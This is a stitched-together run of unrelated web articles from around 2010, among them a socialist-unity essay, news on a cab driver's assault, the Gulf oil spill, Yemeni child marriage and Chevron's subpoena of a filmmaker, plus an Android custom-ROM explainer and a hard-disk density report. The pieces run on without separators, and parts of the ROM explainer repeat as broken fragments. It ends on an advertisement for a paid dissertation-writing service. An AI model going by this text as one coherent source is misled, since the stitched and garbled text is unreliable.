Until we take some serious steps to overcoming this situation the socialist left will not be able to provide the level of leadership required to build really big campaigns that can win victories and draw significant numbers of people into the struggle .
Independent leftists repelled by division
In Australia there is widespread discontent over the various things neoliberal capitalism is doing to our society .
There is a lot of disillusionment with the mainstream political parties and a lot of people are looking for alternatives .
Most progressive , left - wing people do not belong to any organisation or are members or supporters of the Greens or the Australian Labor Party .
While some individuals may join a socialist organisation , the organised left is too small to attract them on a broad scale .
Those who do come closer are most likely to be confused and repelled by the obvious division and disunity .
To convince large numbers of such alienated and disaffected people of the need for fundamental system change or to attract them into a socialist organisation requires a real , sustained move towards genuine left cooperation and unity — including a serious exploration of the possibilities of uniting in a single organisation .
Unity enthuses and inspires
It is a simple fact that serious steps toward left unity inspire and enthuse people whereas needless discord and division discourages people from a closer engagement with the socialist left .
For example , when the global financial crisis first erupted , the various left - wing organisations all held their own forums , all saying much the same thing .
The lack of a united approach weakened the overall impact of the socialist position and prevented us from being able to significantly influence the trade unions and workers shaken by the crisis .
Differences are no excuse
But what about the differences between the various groups ?
Are n’t they a fundamental obstacle to greater unity ?
The short and commonsense answer ?
No , they are not — or , to put it more precisely :
No , they should n’t be .
We all largely agree in our critique of neoliberal capitalism and the need to fight the manifest injustices it creates .
We agree on the need to replace dog - eat - dog capitalist society with socialism .
This was in fact the experience when a number of the far left groups worked together in Socialist Alliance in previous years .
It was relatively easy to get agreement on policy ; the problems were elsewhere .
In our opinion the differences which do exist can be contained within a single organisation — provided there is goodwill and a genuine desire to achieve unity and to make it work .
Old differences may still recur but hopefully they will express themselves in a new form around the real issues we confront in the struggle rather than in an abstract way ( Stalinism versus Trotskyism , “ revolution from below ” , and so on ) .
Left unity by itself will not automatically solve all political problems ; it is still necessary to work out a correct policy .
But unity does create the best framework for doing this .
Socialist Alliance
The Socialist Alliance is attempting to demonstrate this approach .
As its name suggests , it is a coalition of socialists from a range of political backgrounds and traditions .
In January 2010 , the Democratic Socialist Perspective , previously the largest affiliate , dissolved itself and merged all its political and material resources into the Socialist Alliance .
The Socialist Alliance is an unambiguously anti-capitalist organisation .
It is continually developing its policy positions but it is not an “ ideological ” grouping .
It is focuses on relating to the issues which confront us today .
It is worth noting that in a number of other countries sections of the far left have adopted a broadly similar approach .
In France the Ligue Communiste Révolutionnaire , which originated in the May - June 1968 upheaval , dissolved itself at the start of last year into the New Anti-Capitalist Party which brings together forces from the far left , the radical ecology movement , immigrant groups and so on .
In Portugal some years ago , former Trotskyists and Maoists formed the anti-neoliberal Left Bloc ; it attracted over half a million votes in the 2009 elections .
There are many other examples .
The challenge facing us all
Socialism is at a low ebb in Australia .
If we remain disunited and continue to squander so much energy competing with each other we wo n’t be able to fundamentally change this situation .
Every real step towards greater left cooperation and unity will make the socialist movement that much stronger and put us in a better position to win a much larger following behind a program of serious social and economic change .
All left - wing groups and currents will be judged by how we contribute to promoting greater left unity and building socialist leadership on the scale required by the crisis facing us .
Some basic steps forward
Building the struggle is key
In our work in the various movements , the primary goal must be to construct genuine broad - based coalitions .
These are the best vehicles for drawing in larger numbers of people and really advancing the struggle .
Recruitment to one ’s own group is legitimate but it ca n’t be the fundamental objective .
Support all socialist candidates
In Victoria this year we will most likely have both federal and state elections .
It would be a real step forward if all socialist groups publicly supported the candidates of other socialist organisations ( Socialist Alliance , Socialist Party , Revolutionary Socialist Party and Communist Party of Australia ) and advocated a first - preference vote for them .
We should try to avoid situations where we run against one another .
Where problems are likely to arise we should sit down and talk them through .
The Socialist Alliance has always adopted this approach .
We have always supported other socialist candidates and will continue to do so .
Comradely relations
The different socialist organisations should be able to relate to each other in a comradely way and discuss any differences calmly and objectively .
Abusing members of another organisation by calling them “ Stalinists ” is unworthy of serious socialists and should be dropped .
[ Visit the Socialist Alliance web site at http://www.socialist-alliance.org.]
AN enraged cab driver tried to force a car full of teens off the road last night after they threw an egg at his taxi , with the cab driver also threatening the boys with a knife and a tire iron .
The five males , aged from 16 to 20 , were enjoying a night out in Geelong , southwest of Melbourne , but got a lot more than they bargained for after the egg hit the taxi .
Police believe the taxi driver pursued the boys and attempted to force their car off the road by crashing into them .
The boys efforts to escape the taxi driver came to a grinding halt when their car blew a tire after hitting a gutter .
Police believe the taxi driver then crashed into the side of the boys ’ car and jumped out armed with a tire iron and a knife before angrily smashing every window of the car , including the tail lights .
The boys from the Geelong area received minor injuries in the attack .
The 17 - year - old boy who threw the egg , received a caution from police for discharging a missile .
Victoria Police issued a statement this morning titled " Nobody wins " regarding the egg - throwing incident .
The taxi driver , a 41 - year - old man from a town outside of Geelong handed himself into a local police station .
It is expected he will be charged with conduct endangering life , assaults , criminal damage and numerous traffic offenses .
Originally published as Cabbie runs down egg - throwing teens
The future beauty shopper
Find out what motivates beauty shoppers and how you can deliver an experience that meets their needs .
From ethically - sourced , natural and clean products to expert advice on how to use them , beauty shoppers are looking for a personalised , inclusive experience .
Please note :
Please note :
As you are switching from this account to your other Rewards account this may affect availability of items and / or items in your shopping cart .
Do you wish to proceed ?
The Miami New Times has more info from the gay escort who went on a ten - day European vacation with anti-gay activist George Alan Rekers , a co-founder of the right - wing Family Research Council .
Apparently while on the trip , the escort ( identified and photographed on this NSFW website ) was asked to give him nude massages , including a maneuver he called the “ long stroke , ” which was described as a complicated caress “ across his penis , thigh … and his anus over the butt cheeks . ”
The escort ( nicknamed “ Lucien ” ) told the paper that it ’s his understanding that Rekers is gay .
“ It ’s a situation where he ’s going against homosexuality when he is a homosexual , ” he said .
Rekers , sort of surprisingly , has been talking about the issue .
“ He was very good as a travel companion .
He did carry my luggage and that sort of thing , ” Rekers told the New Times .
“ He is very good at that . ”
Rekers , who admits he found the escort on the gay prostitution site Rentboy.com , later adjusted his story when talking to blogger Joe .
My .
God .
“ My hero is Jesus Christ who loves even the culturally despised people , including sexual sinners and prostitutes , ” he said .
“ Like Jesus Christ , I deliberately spend time with sinners with the loving goal to try to help them . ”
Rekers is a board member of the gay - cure organization , after all .
“ If you talk with my travel assistant that the story called “ Lucien , ” you will find I spent a great deal of time sharing scientific information on the desirability of abandoning homosexual intercourse , and I shared the Gospel of Jesus Christ with him in great detail . ”
Also the “ long stroke . ”
There was sharing of that , too .
Like with Jesus !
George Rekers Is a Homosexual , Escort Says [ Riptide 2.0 / Miami New Times ]
COVINGTON , La. --
The dire impact of the massive Gulf spill was apparent Sunday on oil - soaked islands where pelicans nest as several of the birds splashed in the water and preened themselves , apparently trying to clean crude from their feet and wings .
Pelican eggs were glazed with rust - colored gunk in the bird colony , with thick globs floating on top of the water .
Nests sat precariously close the mess in mangrove trees .
As oil crept farther into the delicate wetlands in Barataria Bay off Louisiana , BP officials said Sunday that one of their efforts to slow the leak was n't working as effectively as before .
See
continuing coverage of the Gulf of Mexico oil spill of 2010
on
al.com
and
GulfLive.com
.
To keep track of the Gulf of Mexico oil slick , visit
www.skytruth.org
or follow its
Twitter feed
.
Deepwater Horizon Response
Web site established by government officials .
To see updated projection maps related to the oil spill in the Gulf , visit theWeb site established by government officials .
How to help :
Volunteers eager to help cope with the spill and lessen its impact on the Gulf Coast environment and economy .
HOW YOU CAN HELP
will appear daily in the Press - Register until there is no longer a need for volunteers in response to the oil spill disaster .
If you have suggestions for a story , or if you belong to an organization in need of such help , please call Press - Register Editor Mike Marshall at 251-219-5674 or email him at
.
BP spokesman John Curry told The Associated Press on Sunday that a mile - long tube inserted into the leaking well siphoned some 57,120 gallons of oil within the past 24 hours , a sharp drop from the 92,400 gallons of oil a day that the device was sucking up on Friday .
However , the company has said the amount of oil siphoned will vary widely from day to day .
Engineers are working furiously to stem the growing ooze as more wildlife and delicate coastal wetlands are tainted despite the oil - absorbing booms placed around shorelines to protect them .
A pelican colony off Louisiana 's coast was awash in oil Saturday , and an Associated Press photographer saw several birds and their eggs coated in the ooze while nests rested in mangroves precariously close to the crude that had washed in .
Workers had surrounded the island with the booms , but puddles of oil had seeped through the barrier .
Meanwhile , three top Obama administration officials are returning to the Gulf Coast to monitor the spill response .
Anger with the government and BP , which leased the rig and is responsible for the cleanup , has boiled over as the spill spreads .
U.S. Environmental Protection Agency chief Lisa P. Jackson was headed Sunday to Louisiana , where she planned to visit with frustrated residents .
Secretary of the Interior Ken Salazar and Secretary of Homeland Security Janet Napolitano were to lead a Senate delegation to the region on Monday to fly over affected areas and keep an eye on the response .
White House Press Secretary Robert Gibbs also told CBS ' " Face the Nation " on Sunday that Justice Department officials have been to the region gathering information about the spill .
However , he would n't say whether the department has opened a criminal investigation .
Meanwhile , the official responsible for the oversight of the month - old spill response said he understands the discontent among residents who want to know what 's next .
" If anybody is frustrated with this response , I would tell them their symptoms are normal , because I 'm frustrated , too , " said Coast Guard Commandant Thad Allen .
" Nobody likes to have a feeling that you can't do something about a very big problem . "
President Barack Obama also has named a special independent commission to review what happened .
The spill began after the Deepwater Horizon oil rig exploded off the coast of Louisiana on April 20 , killing 11 workers , and sank two days later .
At least 6 million gallons of crude have spewed into the Gulf of Mexico since , though a growing number of scientists have said they believe it 's more .
The visits from top Obama chiefs come as BP said it will be at least Tuesday before engineers can shoot mud into the blown - out well at the bottom of the Gulf , yet another delay in the effort to stop the oil .
A so - called " top kill " has been tried on land but never 5,000 feet underwater , so scientists and engineers have spent the past week preparing and taking measurements to make sure it will stop the oil that has been spewing into the sea for a month .
They originally hoped to try it as early as this weekend .
" It 's taking time to get everything set up , " BP spokesman Tom Mueller said .
" They 're taking their time .
It 's never been done before .
We 've got to make sure everything is right . "
Crews will shoot heavy mud into a crippled piece of equipment atop the well .
Then engineers will direct cement at the well to permanently stop the oil .
As the spill spreads deeper into vulnerable marshes , some have called for federal officials to take over the response .
But Allen said the government must hold BP accountable .
After the 1989 Exxon Valdez tanker spilled 11 million gallons of oil in Alaska , Congress dictated that oil companies be responsible for dealing with major accidents -- including paying for all cleanup -- with oversight by federal agencies .
BP has tried and failed several times to halt the gusher , and has had some success with the mile - long tube .
Engineers are also developing several other plans in case the top kill does n't work , including an effort to shoot knotted rope , pieces of tire and other material -- known as a junk shot -- to plug the blowout preventer , which was meant to shut off the oil in case of an accident but did not work .
( This report was written by Greg Bluestein and Matthew Brown of The Associated Press .
Associated Press writers Matthew Daly in Washington , Kevin McGill in New Orleans and Associated Press photographer Gerald Herbert in Louisiana contributed to this report . )
It 's a mystery why humans and other animals sleep .
Leading theories suggest it has to do with memory consolidation or other to benefit other physiological or neural functions .
But a new theory holds that sleep is merely a good way to increase an animal 's efficiency , by hunting only when the hunting is good , for example , and minimize its risk :
The risk of an accident goes down when you 're sleeping .
Image
Scientists have long wondered why we sleep and why we dream .
A new study provides evidence for some long - held notions that sleep and dreams boost learning and help us to make sense of the real world .
Even naps can help , the researchers found .
Test subjects who dreamt about a challenging task performed it better than those who did n't have such dreams .
This newfound link between dreaming and learning gives insight into why humans bother to sleep at all .
The study is thought to be the first to show " the relationship between dreaming and function in the outside world , " said senior researcher Robert Stickgold of Harvard Medical School .
While dreams have always mystified mankind , scientists have been equally curious about sleep .
" It is dangerous to go to sleep , " Stickgold said , evolutionarily speaking .
Unconscious beings lying flat on their backs are especially prone to attack , he pointed out .
So why have we evolved to spend a third of our lives sleeping ?
Previous research has shown that sleep benefits the immune and endocrine systems , but it has n't been clear that sleep per se is necessary .
Resting quietly may be enough to meet these needs , Stickgold told LiveScience .
Sleep , however , might affect the brain in a way that no other state can equal , suggests the study published in the most recent issue of the journal Current Biology .
The effect is likely critical for learning and making sense of life -- skills worth sleeping for , scientists think .
Dreaming about it
During the study , 99 participants were taught to navigate a virtual maze on a computer screen .
Half were then allowed to nap for two hours , while the other half remained awake .
Later that day , all participants were re-tested on the maze task .
Those who reported dreaming about the maze significantly improved their performance .
They did better than people who had slept , but did not dream .
And better than those who stayed awake rehearsing the task in their minds .
Specifically , the dreamers bettered their performance more than six times the improvements of all other participants .
Instead of simply rehashing the maze experience , participants described dreams that made broad associations between mazes and other aspects of their lives -- like recalling an experience exploring bat caves or seeing their future job application process depicted with maze - like features .
" Every day , we are gathering and encountering tremendous amounts of information and new experiences , " said lead researcher Erin Wamsley , also of Harvard Medical School , in a press statement .
" It would seem that our dreams are asking the question , ' How do I use this information to inform my life ? ' "
Dreams have priorities
Sleeping essentially lets the chaos of life sink in so we can make sense of it .
A study earlier this year found that even naps boost learning .
" We can't really process one stream of information while we are taking in another one … so sleep becomes necessary , " Stickgold said in a telephone interview .
" It may be that for every two hours we are awake , it takes our brain an hour to process that information , so we need eight hours of sleep a night . "
To remember something in particular -- say , the lines of a play or formulas for an exam -- it might help to study right before dozing , whether that means studying late at night or napping directly after a cram session , Stickgold said .
And if you can get yourself to dream about the material , you are at a particular advantage .
Unfortunately , " dream content is notoriously hard to control , " Stickgold said .
The non-conscious brain " has its own rules , " and focuses on whatever it deems most important , he added .
So your best bet for inducing an exam - acing dream is convincing yourself ( and your brain ) that the material truly matters , Stickgold said ¾ something that is , of course , easier to do for some subjects than others .
Dream interpretation
While some scientists have previously brushed off theories that dreams have meaning , Stickgold says dreams are n't random .
" In dreams , we are seeing the brain 's calculation of ' Do I care ' and ' Why do I care ? ' " he explained .
The brain is also making associations between new information and past experiences .
" What makes the human brain so brilliant is that we can take learning in one area and apply it to another , " Stickgold said .
And sleep may be critical for this level of understanding to occur .
Scientists used to think snoozing was only a cure for sleepiness .
" It was as if we thought the only function of eating was to cure hunger , not to nourish our bodies , " Stickgold said .
But now , researchers might have an understanding of dreams that even mystics may envy .
By reflecting the brain 's effort to prioritize information and make associations , Stickgold said , " dreaming may be part of the process that creates the meaning of our lives . "
Introduction
Ever wondered what the whole Android custom ROM scene was about ?
What is all this talk of installing " aftermarket " , custom upgrades on your phone ?
Who needs it ?
Why do it ?
Is it safe ?
Do n't fret - I 'm here to explain - the AndroidPolice Academy is now in session .
By the way , the word ROM means Read Only Memory , but has migrated in the modding community to mean an actual custom OS image that you install into the ROM area of your phone .
By the way , the word ROM meanseadnlyemory , but has migrated in the modding community to mean an actual custom OS image that you install into the ROM area of your phone .
Also , the word kernel essentially means the heart of the OS - it 's the barebones operating system components .
Custom ROMs
A stock ROM is the version of the phone 's operating system that comes with your phone when you buy it .
A custom ROM is a fully standalone version of the OS , including the kernel ( which makes everything run ) , apps , services , etc - everything you need to operate the device , except it 's customized by someone in some way .
So what does the " customized " part mean ?
Since Android is open source , developers are free to take stock ROMs , modify them , strip them of garbage , optimize them , add things , and pretty much do whatever their imagination and skills allow .
Why You Want Custom ROMs
Using a custom ROM usually results in more frequent updates that fix bugs and introduce new features because the developer behind the ROM does n't have the same procedures and red tape that the manufacturer + carrier combo does .
A quality update can be churned faster because it does n't involve the bureaucracy of 30 different project managers , 15 vice presidents , and 5 dozen marketing departments .
because it does n't involve the bureaucracy of 30 different project managers , 15 vice presidents , and 5 dozen marketing departments .
A ROM developer usually gains a loyal community which beta tests his updates in real life situations and provide feedback , or even fixes bugs - that 's the beauty of open source software .
which his updates in real life situations and provide feedback , or even fixes bugs - that 's the beauty of .
Oh and did I mention that ROMs are usually free and supported by optional donations ?
If you can't afford to pay for it , you do n't have to .
and supported by optional donations ?
If you can't afford to pay for it , you do n't have to .
Finally , most custom ROMs out there are updateable over the air ( OTA ) and without reinstalling anything .
Who does n't love open source after this ?
Better Performance And Efficiency
Custom ROMs are oftentimes faster , more efficient , and use less memory because
the developer ripped out useless garbage , such as carrier installed apps or
, such as carrier installed apps or the developer optimized the kernel .
For example , an undervolted kernel can provide a much better battery life than the stock one .
Upgrading To A Better / Later Version Of Android
You can upgrade to a version of the OS that has not yet been released for your device , or never will be .
This is possible in 2 situations :
A leaked version of the new ROM showed up online , and the developer got on it like the fat kid chasing an ice cream truck .
This was exactly the case with Hero and Android 2.1 , allowing me to upgrade from 1.5 weeks ( months ) before the official version was available and ditch the bogged down and slow stock OS .
of the new ROM showed up online , and the developer got on it like the fat kid chasing an ice cream truck .
This was exactly the case with Hero and Android 2.1 , allowing me to upgrade from 1.5 weeks ( months ) before the official version was available and ditch the bogged down and slow stock OS .
A ROM from another phone was ported by the developer to work on yours .
For example , G1 and MyTouch 3G users may never see Android 2.1 officially released on their phones , but Cyanogen , one of the most respected Android developers , was recently able to create a custom ROM running 2.1 for those devices .
Oh , what a happy day it was for MT3G and G1 owners .
Ability To Install Apps To The SD Card
Most custom ROMs nowadays come with the ability to install applications to the SD card , called Apps2SD ( or A2SD ) .
This is currently not possible on stock ROMs , even in Android 2.1 and is supposedly on Google 's TODO list .
If you have run out of space on your phone ( which I have repeatedly on my Hero ) , Apps2SD is a killer feature to have .
About That Rooting Business …
Do n't confuse custom ROMs with rooting - they 're completely different .
We have explained rooting and its benefits in an article called Rooting Explained +
Top 5 Benefits Of Rooting Your Android Phone .
The Downsides Of Custom ROMs
Of course , there are dangers of using custom ROMs which you should be aware of .
Something Could Go Wrong
First of all , something may go wrong with the flashing process ( that 's the process of installing the ROM ) and leave your phone in a bricked state .
The chances of this are pretty low nowadays , and most of the time you can restore it back to normal .
Try to go for the ROM that has been tested by time and has lots of positive feedback .
Clean Wipe
In order to install a custom ROM , you need to perform a clean wipe .
This means you will lose all existing data , so you have to back everything up first .
Of course , just for this , we have a straightforward tutorial that shows how to back up and restore your entire phone : [ Complete Guide ] How To Fully Back Up And Restore Your Android Phone Using Nandroid Backup .
Potential Problems
Custom ROMs could have bugs … but then so do the stock ones .
However , in case you do find a bug , you actually have a 2 - way channel of reporting it - post in the ROM forum and you will more than likely get an answer back and your bug acknowledged .
Try doing this to your phone manufacturer and see if you can get past the first level of outsourced monkeys , let alone actual developers .
You May Void Your Warranty
It 's possible that custom rooting will void your warranty because you will " break the seal " on the boot loader by installing a custom one which on some phones apparently can't be undone ( this includes the Nexus One ) .
Because of that , the manufacturer might be able to tell that the phone has had a custom ROM installed and not honor the warranty , in case you need to use it .
Now , in most cases , the benefits of the custom ROM outweigh the possibility of your warranty being denied .
I recommend getting a warranty from your carrier and using that in case anything bad happens ( that warranty is usually unconditional and covers things like losses and physical damage ) .
Getting The Right Custom ROM
New phones and ROMs come out all the time , and the scope of this article does n't cover individual ROMs - but the general approach to finding one is Googling for " YOUR_PHONE_MODEL ROM " or something similar , optionally including the wanted Android version .
Try it out - you 'll find what you want .
Conclusion
And there you have it - another tutorial is in the can , as Leo Laporte likes to say .
Have you found it useful or got anything to add ?
Please share in the comments .
Grüne gegen Menschenkette
PARLAMENTSBESCHLUSS
Grüne machen sich aus Koalitionsgründen nicht für Anti-Atom - Aktion stark
Die von CDU und Grünen dominierte Bürgerschaft macht sich nicht für die Anti-Atom - Menschenkette stark .
Die GAL - Fraktion , eigentlich vehemente Gegnerin der Kernkraft , verhinderte am Donnerstag aus Koalitionsräson entsprechende Anträge von SPD und Linken .
Die SPD hatte verlangt , dass das Parlament die Menschenkette zwischen den Pannenreaktoren Krümmel und Brunsbüttel unterstützen solle .
Außerdem wollte die Opposition vom Senat verlangen , dass dieser sich für die sofortige Stilllegung der Kernkraftwerke Brunsbüttel und Krümmel einsetzt und geplanten Laufzeitverlängerungen klar widerspricht .
Die Opposition kritisierte die GAL .
„ Es ist unerträglich , dass die Grünen sich in Hamburg außerparlamentarisch als der wichtigste Partner im Kampf gegen Atomkraft aufführen , aber im Parlament nichts unternehmen “ , sagte die Linken - Fraktionsvorsitzende Dora Heyenn .
Sie erinnerte an den Bürgerschaftsbeschluss von September 2009 .
Darin hatten CDU und GAL nach Pannen im AKW Krümmel nur beschlossen , dass der Senat „ bei Zweifeln am sicheren Betrieb “ darauf hinwirken soll , das AKW dauerhaft stillzulegen .
( dpa )
“ I am against the child marriage law because it restrains the freedom of others .
When a certain age [ for marriage ] is set , it violates the rights of others .
For example , imagine a young man of 13 or 14 years of age who wants to have sex . …
This is a violation of his rights , ” Sheik Hamzi told The Times in an interview at his Sana home last week .
Although he emphasizes that a woman should not get married before she is physically and mentally ready and that she herself needs to accept the marriage , he believes a law that prohibits child marriage constitutes a rights violation .
Sheik Mohammed Hamzi , an official of the Islamist Yemeni opposition party Islaah and the imam of the Al - Rahman mosque in the Yemeni capital of Sana , is one of those who staunchly opposes a legal ban on child marriage .
But that may prove a daunting challenge since fierce opposition against a ban on child brides still runs high among some religious leaders and conservatives .
They are now stepping up their lobbying efforts to push for the implementation of a child marriage ban .
The recent death of 13 - year old Yemeni child bride Elham Assi , who reportedly bled to death last week after being tied down and forced to have sex with her 23 - year - old husband , has sparked outrage among rights activists in Yemen .
Last week , representatives from various rights groups and independent activists met at the Women ’ Media Forum , or WMF , in Sana to discuss ways to convince supporters of child marriage to back a proposal to set the mimum age for marriage at 17 .
Lawmakers in February 2009 set the age limit for marriage at 17 , but the law was repealed and returned to the Yemeni parliament 's constitutional committee for review after some lawmakers objected to it and billed the law un -Islamic , according to the Associated Press .
The committee is expected to make a final decision on the law later this month .
Two years ago , 9 - year - old Yemeni child bride Nujoud Ali captured the world 's attention and became a symbol of Yemen 's child brides when she showed up in a Sana court and demanded a divorce from her 30 - something husband .
Since then , several other cases of Yemeni child brides have been reported , and the issue also has been discussed and debated widely .
But Hazmi dismisses claims by rights groups that there is a problem with child marriages in his country .
He said the child - bride cases that have been reported in the media were merely isolated incidents .
“ Just ask my mother and sisters how many times they ’ve found a little girl getting married at the marriages they ’ve attended , " he said .
" Not many . ”
The country 's Ministry of Social Affairs , on the contrary , says child marriages are common in Yemen .
According to a 2009 report by the ministry , a quarter of all females in Yemen marry before the age of 15 .
To Hazmi , however , women's - and children 's - rights activists are putting a few isolated cases of child marriage in the spotlight to rally support for the law .
" There is no problem here with child marriage , " he said .
" These cases of young girls getting married are exceptions .
These organizations that are promoting for this law could n’t find any examples except for those of Nujoud and Elham . "
Hazmi said the groups that are campaigning for the law were harmful to the country , trying to promote a " Western agenda " in Yemen .
“ It ’s all a Western agenda they are following , " he said .
" They get paid from the West to make us to believe in Western culture .
This is very bad because our culture is different here . "
The best that could happen , in his opinion , is that the government shuts them down .
“ No one wants to marry these women 's - rights activists anyway , " he said .
" They ’re just depressed that they are not married and jealous . ”
Would he allow his own young daughters to be married ?
" No , " he says and looks at the two as they 're scurrying around in the room .
" At this age , I do n’t want them married . "
-- Alexandra Sandels in Sana , Yemen
Photos : Sheik Mohammed Hazmi is one of those who opposes a ban on child brides in Yemen .
Credit : Khaled Hilaly / Special to The Times .
Lower image : Yemeni child divorcee Nujod Ali outside her home in Sana .
Credit : Katia Jarjoura
The RNC continues to send out deceptive mailers designed to look like census documents just weeks after Congress passed a law aimed at making such practices illegal and requiring certain information on the envelope to prevent recipients from being mislead .
We have the mailer and the RNC ’s response :
The law does n’t apply to us .
Bit addressing during TAR writing on bit patterned media .
a , Schematic of the head path and write waveforms during experiment .
Both up and down orientations were written .
The head path is purposefully misaligned to the track direction by a fraction of a degree .
Initial phase is random with each track .
Write frequency was incremented by 1 % between tracks .
b , Large area HR - MFM image of resulting tracks .
Scale bar , 1um .
Single tone tracks at the highest data frequency are written properly with no adjacent track writing when the head is centered on the track and in phase with the island positions .
Nebulous light regions are due to reversal of the soft magnetic material in the trenches between islands .
c , Close - up HR - MFM image of a single track .
60 islands are written correctly before the write phase and track centering drift too far .
Scale bar , 500 nm .
Image credit Nature Photonics , doi:10.1038/nphoton.2010.90 .
( PhysOrg.com ) --
The majority of today 's hard disks use perpendicular recording , which means their storage densities are limited to a few hundred gigabytes per square inch .
Scientists have for some time been trying to find ways of increasing the limit , and a new method has been proposed that could stretch the limit as high as ten terabits ( Tb ) per square inch .
The research , published in this week ’s Nature Photonics , has found a method that combines two writing procedures to store data on hard drives .
Each procedure writes tightly packed data without affecting data on the bits surrounding it and avoiding the usual challenge with tightly packing data , which is that the heat generated in the write head can create superparamagnetisim that can interfere with surrounding bits and jumble the data on them ( by flipping a 0 state to 1 or vice versa ) .
One of the procedures used is bit - patterned recording ( BPR ) , which writes to “ magnetic islands ” lithographed into the surface , which isolate the write events and prevent superparamagnetic effects occurring .
The other is thermally - assisted magnetic recording ( TAR ) , in which a tiny region of the surface is heated when data are being written and then cooled .
The heat allows the surface to magnetize quickly , and this , the small - grained design of the surface , and the distance between bits all help to prevent superparamagnetisim .
The two methods both present difficulties : BPR is limited by the need for a write head that exactly matches the size of the magnetic islands , while TAR is limited by its need for small grain media that can tolerate heating and cooling , and the difficulty of controlling the area heated .
It turns out that combining the two methods solves all the problems .
BPR ’s magnetic islands remove the need for small grain media , and TAR writes only to the heated bit , so the size of the write head is less important .
Using the two methods in combination means surrounding bits are unaffected , and data can be tightly packed on less expensive surfaces .
The new system , developed by Barry C. Stipe and colleagues from Hitachi research groups in California and Japan , uses a plasmonic nano - antenna to write the data , with laser light guided via a waveguide to the antenna , where it is transformed into a charge .
The “ E - shaped ” antenna has a 20 - 25 nanometer ( nm ) wide middle prong that concentrates the charge on an area as tiny as 15 nm in diameter , rather like a lightning rod , with the outer prongs acting as grounds .
The write speed obtained by the researchers was 250 megabits per second and the error rate was low .
Data tracks were separated by 24 nm , and the researchers obtained a data storage density of one terabit per square inch of high - quality data quite easily .
The researchers believe 10 terabits per square inch is theoretically possible .
Explore further InPhase Demos 515 Gigabits Per Square Inch Data Density
More information : Magnetic recording at 1.5 Pb m^ ( −2 ) using an integrated plasmonic antenna , Barry C. Stipe et al. , Nature Photonics , Published online : 2 May 2010 .
Magnetic recording at 1.5 Pb m^ ( −2 ) using an integrated plasmonic antenna , Barry C. Stipe et al. , , Published online : 2 May 2010 .
doi:10.1038/nphoton.2010.90
© 2010 PhysOrg.com
by Bill Moyers and Michael Winship
Even as headlines and broadcast news are dominated by BP 's fire - ravaged , sunken offshore rig and the ruptured well gushing a reported 210,000 gallons of oil per day into the Gulf of Mexico , there 's another important story involving Big Oil and pollution - one that shatters not only the environment but the essential First Amendment right of journalists to tell truth and shame the devil .
( Have you read , by the way , that after the surviving , dazed and frightened workers were evacuated from that burning platform , they were met by lawyers from the drilling giant Transocean with forms to sign stating they had not been injured and had no first - hand knowledge of what had happened ?!
So much for the corporate soul . )
But our story is about another petrochemical giant - Chevron - and a major threat to independent journalism .
In New York last Thursday , Federal Judge Lewis A. Kaplan ordered documentary producer and director Joe Berlinger to turn over to Chevron more than 600 hours of raw footage used to create a film titled Crude : The Real Price of Oil .
Released last year , it 's the story of how 30,000 Ecuadorians rose up to challenge the pollution of their bodies , livestock , rivers and wells from Texaco 's drilling for oil there , a rainforest disaster that has been described as the Amazon 's Chernobyl .
When Chevron acquired Texaco in 2001 and attempted to dismiss claims that it was now responsible , the indigenous people and their lawyers fought back in court .
Some of the issues and nuances of Berlinger 's case are admittedly complex , but they all boil down to this :
Chevron is trying to avoid responsibility and hopes to find in the unused footage - material the filmmaker did not utilize in the final version of his documentary - evidence helpful to the company in fending off potential damages of $ 27.3 billion .
This is a serious matter for reporters , filmmakers and frankly , everyone else .
Tough , investigative reporting without fear or favor - already under siege by severe cutbacks and the shutdown of newspapers and other media outlets - is vital to the public awareness and understanding essential to a democracy .
As Michael Moore put it , " The chilling effect of this is , [ to ] someone like me , if something like this is upheld , the next whistleblower at the next corporation is going to think twice about showing me some documents if that information has to be turned over to the corporation that they 're working for . "
In an open letter on Joe Berlinger 's behalf , signed by many in the non-fiction film business ( including the two of us ) , the Independent Documentary Association described Chevron 's case as a " fishing expedition " and wrote that , " At the heart of journalism lies the trust between the interviewer and his or her subject .
Individuals who agree to be interviewed by the news media are often putting themselves at great risk , especially in the case of television news and documentary film where the subject 's identity and voice are presented in the final report .
" If witnesses sense that their entire interviews will be scrutinized by attorneys and examined in courtrooms they will undoubtedly speak less freely .
This ruling surely will have a crippling effect on the work of investigative journalists everywhere , should it stand . "
Just so .
With certain exceptions , the courts have considered outtakes of a film to be the equivalent of a reporter 's notebook , to be shielded from the scrutiny of others .
If we - reporters , journalists , filmmakers - are required to turn research , transcripts and outtakes over to a government or a corporation - or to one party in a lawsuit - the whole integrity of the process of journalism is in jeopardy ; no one will talk to us .
In his decision , Judge Kaplan wrote that , " Review of Berlinger 's outtakes will contribute to the goal of seeing not only that justice is done , but that it appears to be done . "
He also quoted former Supreme Court Justice Louis D. Brandeis ' famous maxim that " sunlight is said to be the best of disinfectants . "
There is an irony to this , noted by Frank Smyth of the Committee to Protect Journalists .
Brandeis " made his famous sunlight statement about the need to expose bankers and investors who controlled ' money trusts ' to stifle competition , and he later railed against " not only powerful corporations but the lawyers and other members of the bar who worked to perpetuate their power . "
In a 1905 speech before the Harvard Ethical Society , Brandeis said , " Instead of holding a position of independence , between the wealthy and the people , prepared to curb the excesses of either , able lawyers have , to a large extent , allowed themselves to become adjuncts of great corporations and have neglected the obligation to use their powers for the protection of the people . "
Now , more than a century later , Chevron , the third largest corporation in America , according to Forbes magazine , has hauled out their lawyers in a case that would undermine the right of journalists to protect the people by telling them the truth .
Joe Berlinger and his legal team have asked Judge Kaplan to suspend his order pending an appeal to the United States Court of Appeals for the Second Circuit .
As the Independent Documentary Association asserts , " This case offers a clear and compelling argument for more vigorous federal shield laws to protect journalists and their work , better federal laws to protect confidential sources , and stronger standards to prevent entities from piercing the journalists ' privilege .
We urge the higher courts to overturn this ruling to help ensure the safety and protection of journalists and their subjects , and to promote a free and vital press in our nation and around the world . "
Bill Moyers is president of the Schumann Center for Media and Democracy .
Michael Winship is president of the Writers Guild of America , East .
Rebecca Wharton conducted original research for this article .
_______
About author Bill Moyers is managing editor of the weekly public affairs program Bill Moyers Journal , which airs Friday night on PBS .
Check local airtimes or comment at The Moyers Blog at Bill Moyers is managing editor of the weekly public affairs program Bill Moyers Journal , which airs Friday night on PBS .
Check local airtimes or comment at The Moyers Blog at www.pbs.org/moyers
UK - Dissertation - Dissertation Writing Service that Solves Your Problems
What ’s the problem with so many students in need of dissertation writing services UK ?
Sure ; we can discuss that issue .
But you must be prepared to face the reality : our educational system is failing hard .
